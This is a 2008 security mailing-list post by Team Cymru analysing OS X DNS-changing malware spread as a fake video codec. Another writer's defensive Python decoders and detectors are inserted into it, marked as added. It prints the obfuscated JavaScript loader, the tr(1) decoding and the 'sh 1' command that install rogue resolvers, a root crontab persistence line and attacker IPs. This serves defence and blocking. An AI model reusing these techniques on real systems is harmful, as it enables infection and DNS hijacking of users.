[nsp-sec] [ OT ] MacOS X malware
Rob Thomas
robt at cymru.com
Wed Apr 2 15:07:07 EDT 2008
Hi, team.
Given the large number of Mac users in this community, and given that
this collection of dodgy web sites are infecting Windows and MacOS X, I
thought this was reasonably appropriate for this list. Some folks on
this list might want to take action against some of these IPs.
Yes it's true - there is malware for the MacOS X platform. While this
report will cover a recent release, the malware itself isn't new and
hacking MacOS X isn't new, either.
You can read a public blog post and some useful follow-ups at the
following URL:
<http://tacit.livejournal.com/238112.html>
Here is our analysis. Some of these links are rude even in name, and
all of them are unsafe.
The fun begins with at least one porn site. The site brings the user
through a few redirects to a site here:
88.85.72.147
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
35415 | 88.85.72.147 | 88.85.64.0/19 | NL | ripencc | 2006-02-08 | WEBAZILLA WebaZilla European Network
The page there loads some fun Javascript:
var str=["332", "331", "331", "331", "440", "419", "436",
"354", "434", "433", "440", "383", "370", "381", "332",
"331", "331", "331", "424", "439", "432", "421", "438",
"427", "433", "432", "354", "443", "441", "439", "427",
"422", "420", "430", "444", "433", "427", "362", "435",
"439", "423", "436", "443", "363", "445", "332", "331",
"331", "331", "331", "441", "427", "432", "422", "433",
"441", "368", "430", "433", "421", "419", "438", "427",
"433", "432", "383", "361", "426", "438", "438", "434",
"380", "369", "369", "430", "419", "432", "422", "427",
"432", "425", "426", "419", "430", "430", "368", "421",
"433", "431", "369", "427", "432", "368", "421", "425",
"427", "385", "373", "361", "381", "332", "331", "331",
"331", "447"];
var temp='';
var gg='';
for (i=0; i<str.length; i++){
gg=str[i]-322;
temp=temp+String.fromCharCode(gg);
}
eval(temp);
This translates to (I've heavily obfuscated the URL below):
var pov=0;
function ywuidblzoi(query){
window.location='h x x p : / / landinghall . com / in.cgi?3';
}
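As an added example (not part of Rob's post, and not the malware's own code), the following Python reproduces the analyst step above: it recovers the subtraction constant from the array by itself, rebuilds the string the way the loop does, and pulls out the window.location target in defanged form instead of passing anything to eval(). The array is copied from the post; the regex and the defanging style are my own assumptions.

```python
import re

# Copy of the obfuscated "str" array from the post: each entry is a decimal
# character code shifted by a constant (322 in this sample).
OBFUSCATED = [
    "332", "331", "331", "331", "440", "419", "436",
    "354", "434", "433", "440", "383", "370", "381", "332",
    "331", "331", "331", "424", "439", "432", "421", "438",
    "427", "433", "432", "354", "443", "441", "439", "427",
    "422", "420", "430", "444", "433", "427", "362", "435",
    "439", "423", "436", "443", "363", "445", "332", "331",
    "331", "331", "331", "441", "427", "432", "422", "433",
    "441", "368", "430", "433", "421", "419", "438", "427",
    "433", "432", "383", "361", "426", "438", "438", "434",
    "380", "369", "369", "430", "419", "432", "422", "427",
    "432", "425", "426", "419", "430", "430", "368", "421",
    "433", "431", "369", "427", "432", "368", "421", "425",
    "427", "385", "373", "361", "381", "332", "331", "331",
    "331", "447",
]

# Character codes a decoded JavaScript snippet may plausibly contain:
# printable ASCII plus tab, newline and carriage return.
ALLOWED = set(range(32, 127)) | {9, 10, 13}


def decode(values, offset):
    """Mirror the loop 'gg = str[i] - offset; String.fromCharCode(gg)',
    returning the text instead of executing it."""
    return "".join(chr(int(v) - offset) for v in values)


def guess_offsets(values):
    """Return every subtraction constant under which all decoded characters
    fall in ALLOWED. Handy when the constant is computed at runtime rather
    than written in the loader as it is here."""
    codes = [int(v) for v in values]
    lo, hi = min(codes), max(codes)
    # hi - off must be <= 126 and lo - off must be >= 9
    return [off for off in range(hi - 126, lo - 9 + 1)
            if all((c - off) in ALLOWED for c in codes)]


# Assignment to window.location (regex is an assumption for this sample).
LOCATION_RE = re.compile(r"window\.location\s*=\s*['\"]([^'\"]+)['\"]")


def defang(url):
    """Render a URL non-clickable, in the spirit of the post (hxxp, [.])."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def extract_redirects(script):
    """List every window.location target in the script, defanged."""
    return [defang(u) for u in LOCATION_RE.findall(script)]


def analyse(values):
    """Full pipeline: pick the offset, decode, extract redirect targets."""
    offsets = guess_offsets(values)
    if len(offsets) != 1:
        raise ValueError(f"ambiguous or no offset candidates: {offsets}")
    script = decode(values, offsets[0])
    return offsets[0], script, extract_redirects(script)


if __name__ == "__main__":
    off, script, targets = analyse(OBFUSCATED)
    print(f"offset {off}\n{script}\nredirects: {targets}")
```

Running it prints the same two-line function shown above; the redirect list is what you would hand to a blocklist, without the sample ever touching a JavaScript engine.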
The host landinghall.com resolves to 88.214.202.180, located at the
following provider:
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
23393 | 88.214.202.180 | 88.214.192.0/18 | GB | ripencc | 2006-01-18 | ISPRIME - ISPrime, Inc.
In addition to the malware, the images are extremely graphic. Consider
yourself warned.
The web site determines the visitor's OS and then decides which malware
to offer. This is masked as a video codec to play the porn
available on this "PornTube" (their name) site.
Note well that if the browser has pop-ups blocked, there is no risk to
MacOS X users so far as we can discern.
At this point the MacOS X user is prompted to download a disk image for
installation. This image is named 1023.dmg and is served from:
64.28.178.27, 64-28-178-27-rev.cernel.net
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
27595 | 64.28.178.27 | 64.28.176.0/20 | US | arin | 2005-12-29 | INTERCAGE - InterCage, Inc.
The MacOS X user *must* provide his or her password to enable the
installation of this malware masked as a video player. This is not a
0day attack - it is social engineering.
The preinstall and preupgrade scripts are the same and contain 25 lines.
Both use an interesting obfuscation technique - the Unix tr(1) command.
The script first cat(1)'s itself and pipes the bottom 23 lines of itself
through tr(1). The first tr(1) round does the following (I've cleaned
this up a bit to make it more legible):
tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
It next sets two variables:
s1 = cx.zxx.aas.xd
s2 = cx.zxx.aaz.ace
The script called "1" is now run with these two variables as arguments,
piped through tr(1) again (line split to make it more legible):
sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
`echo $s2| tr qazwsxedcr 0123456789`
The tr(1) command translates those two "strings" into the following two
IP addresses:
s1 = 85.255.114.57
s2 = 85.255.112.186
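An added example (mine, not from the post or the installer) that does the same substitution in Python so the two "strings" can be recovered without running any of the installer's shell: a tr(1)-style translate, the two character sets and the two strings copied from the post, and a check that the result is really an IPv4 address. The padding rule for a short second set follows what both GNU and BSD tr document (repeat the last character).

```python
import ipaddress


def tr(text, set1, set2):
    """Character-for-character translation like tr(1). A shorter SET2 is
    padded by repeating its last character, as GNU and BSD tr do; characters
    not in SET1 pass through unchanged."""
    if not set2:
        raise ValueError("SET2 must not be empty")
    set2 = set2 + set2[-1] * (len(set1) - len(set2))
    return text.translate(str.maketrans(set1, set2[:len(set1)]))


# Character sets and strings as they appear in the post.
ROUND1_FROM = "vdehrujzpbqafwtgkxyilcnos"
ROUND1_TO = "upxmfqrzibdanwgkethlcyosv"
DIGIT_FROM = "qazwsxedcr"
DIGIT_TO = "0123456789"
S1 = "cx.zxx.aas.xd"
S2 = "cx.zxx.aaz.ace"


def recover_ip(encoded):
    """Undo the digit substitution and validate the result as IPv4."""
    return str(ipaddress.IPv4Address(tr(encoded, DIGIT_FROM, DIGIT_TO)))


def is_unambiguous(set1, set2):
    """True when the substitution can be reversed: equal lengths and no
    repeated target character (otherwise two inputs collapse into one)."""
    return len(set1) == len(set2) and len(set(set2)) == len(set2)


def undo_round1(text):
    """Reverse the first tr(1) round for text made only of ROUND1_FROM
    letters, by swapping the two sets."""
    return tr(text, ROUND1_TO, ROUND1_FROM)


if __name__ == "__main__":
    print("s1 =", recover_ip(S1))
    print("s2 =", recover_ip(S2))
    print("round 1 reversible:", is_unambiguous(ROUND1_FROM, ROUND1_TO))
```

Note that the first-round alphabet is not a permutation of itself: "m" is absent from the first set and "j" from the second, so a letter that does not occur in the first set passes straight through, and the reversal is only exact for text built from letters of the first set. That is worth knowing before trusting a mechanical undo of the whole script body.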
Those IPs belong to:
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
27595 | 85.255.114.57 | 85.255.114.0/23 | UA | ripencc | 2005-06-16 | INTERCAGE - InterCage, Inc.
36445 | 85.255.112.186 | 85.255.112.0/24 | UA | ripencc | 2005-06-16 | CERNEL-ASN - Cernel, Inc
The script called "1" looks for some basic IPv4 settings on the Mac.
It then replaces the DNS name servers in the netinfo database with
85.255.114.57 and 85.255.112.186. Any DNS queries from the compromised
Mac are now sent to these two name servers.
Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.
These IPs are no stranger to badness. We count 17 distinct samples in
our malware menagerie that reference 85.255.114.57. The host at
85.255.112.186 has been involved with at least 60 malware samples that
hijack DNS settings.
If a query is made for a non-existent DNS RR, these DNS name servers
return an answer of 64.28.185.108.
64.28.185.108, 64-28-185-108-rev.cernel.net
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
27595 | 64.28.185.108 | 64.28.176.0/20 | US | arin | 2005-12-29 | INTERCAGE - InterCage, Inc.
The script then installs itself into root's crontab as:
* * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"
By default there is no root crontab on MacOS X, so this one really
stands out.
The QuickTime.xpt script is just a copy of the "1" script. This will
now run once per minute, as root, ensuring the malware and the DNS
changes aren't removed or lost for long.
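For those who want to sweep their own Macs for this, here is an added Python example (mine, not from the post) that checks the two persistence indicators described above against text you already have: root's crontab listing and the list of configured resolvers. The crontab sample and resolver list below are constructed for the demo; the resolver prefixes on the watch list are the two named in the post.

```python
import ipaddress
import re

# Resolver prefixes named in the post for the hijacked name servers.
RESOLVER_WATCHLIST = [ipaddress.ip_network(p)
                      for p in ("85.255.112.0/24", "85.255.114.0/23")]

# Constructed sample of 'crontab -l' for root: one ordinary job plus an
# entry modelled on the persistence line quoted in the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
30 3 * * * /usr/sbin/periodic daily
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt" >/dev/null 2>&1
"""

# Constructed resolver list: one normal ISP resolver (documentation range)
# and one that falls in the hijack prefix.
SAMPLE_RESOLVERS = ["192.0.2.53", "85.255.114.57"]

CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
PLUGIN_DIR = "/Library/Internet Plug-Ins/"


def parse_crontab(text):
    """Return (schedule_fields, command) for every job line."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m.group(1, 2, 3, 4, 5), m.group(6)))
    return jobs


def cron_findings(text):
    """List (command, reasons) for jobs that match the traits the post
    describes: every-minute schedule, a command living in the browser
    plug-in folder, and all output thrown away."""
    findings = []
    for fields, command in parse_crontab(text):
        reasons = []
        if fields == ("*",) * 5:
            reasons.append("runs every minute")
        if PLUGIN_DIR in command:
            reasons.append("executes a file from the browser plug-in folder")
        if ">/dev/null 2>&1" in command:
            reasons.append("discards all output")
        if reasons:
            findings.append((command, reasons))
    return findings


def resolver_findings(resolvers):
    """List (resolver, prefix) for resolvers inside a watch-listed prefix."""
    hits = []
    for r in resolvers:
        addr = ipaddress.ip_address(r)
        for net in RESOLVER_WATCHLIST:
            if addr in net:
                hits.append((r, str(net)))
    return hits


if __name__ == "__main__":
    for command, reasons in cron_findings(SAMPLE_CRONTAB):
        print("cron:", command, "->", "; ".join(reasons))
    for resolver, net in resolver_findings(SAMPLE_RESOLVERS):
        print("resolver:", resolver, "in", net)
```

On a real machine feed it the output of "sudo crontab -l" and whatever your OS version uses to list resolvers; the point of the three separate reasons is that an every-minute job on its own can be legitimate, whereas all three together look very much like what the post describes.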
A Perl script named "sendreq" is run and deleted. This script is a
beacon, sending the output of "uname -p" (the machine processor
architecture name, e.g. "i386") and the hostname(1) command to a web
server. The web server is:
64.28.188.220, 64-28-188-220-rev.cernel.net
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
27595 | 64.28.188.220 | 64.28.176.0/20 | US | arin | 2005-12-29 | INTERCAGE - InterCage, Inc.
This is done as an HTTP GET command from the compromised Mac, with the
Accept-Language: field set to the information obtained from the
uname(1) and hostname(1) commands run on the compromised Mac.
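The beacon leaves a simple mark in proxy logs: an Accept-Language value that is not a language-tag list. As an added example (mine, not from the post), here is a Python check over a few constructed proxy log lines that flags exactly that, and separately flags requests to the web-server prefix named above. The log format, the client addresses and the request path are all invented for the demo; the post does not give the beacon's path.

```python
import ipaddress
import re

# Prefix of the beacon web server named in the post.
BEACON_WATCHLIST = [ipaddress.ip_network("64.28.176.0/20")]

# A language range per RFC 2616 (primary tag, optional subtags, optional q).
LANG_RANGE = (r"(?:\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*)"
              r"(?:\s*;\s*q=(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?))?")
ACCEPT_LANGUAGE_RE = re.compile(rf"^\s*{LANG_RANGE}(?:\s*,\s*{LANG_RANGE})*\s*$")

# Constructed proxy log: timestamp, client, server, method, path, and the
# quoted Accept-Language header. Line 2 imitates the beacon with a made-up
# architecture/hostname pair and a placeholder path.
SAMPLE_LOG = """\
2008-04-02T14:01:10Z 10.0.0.5 198.51.100.10 GET /index.html "en-US,en;q=0.8"
2008-04-02T14:01:12Z 10.0.0.7 64.28.188.220 GET /PLACEHOLDER-PATH "i386 studio-imac.local"
2008-04-02T14:01:15Z 10.0.0.9 198.51.100.12 GET /news "fr-CA,fr;q=0.9,en;q=0.5"
2008-04-02T14:01:19Z 10.0.0.7 198.51.100.10 GET /search "*"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def is_language_tag_list(value):
    """True when the header value is syntactically a list of language ranges."""
    return ACCEPT_LANGUAGE_RE.match(value) is not None


def in_watchlist(server):
    addr = ipaddress.ip_address(server)
    return any(addr in net for net in BEACON_WATCHLIST)


def analyse_log(text):
    """Return (client, server, reasons) for every flagged request."""
    flagged = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, client, server, _method, _path, accept_language = m.groups()
        reasons = []
        if not is_language_tag_list(accept_language):
            reasons.append(f"Accept-Language is not a language list: {accept_language!r}")
        if in_watchlist(server):
            reasons.append(f"server {server} is in the beacon watch list")
        if reasons:
            flagged.append((client, server, reasons))
    return flagged


if __name__ == "__main__":
    for client, server, reasons in analyse_log(SAMPLE_LOG):
        print(client, "->", server)
        for r in reasons:
            print("   ", r)
```

The syntax check is the more durable of the two signals: the server IPs will move, but a header that carries a processor name and a hostname will never parse as a language list.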
We see at least 227 victims, mostly in the US.
Thanks,
Rob.
--
Rob Thomas
Team Cymru
The WHO and WHY team
http://www.team-cymru.org/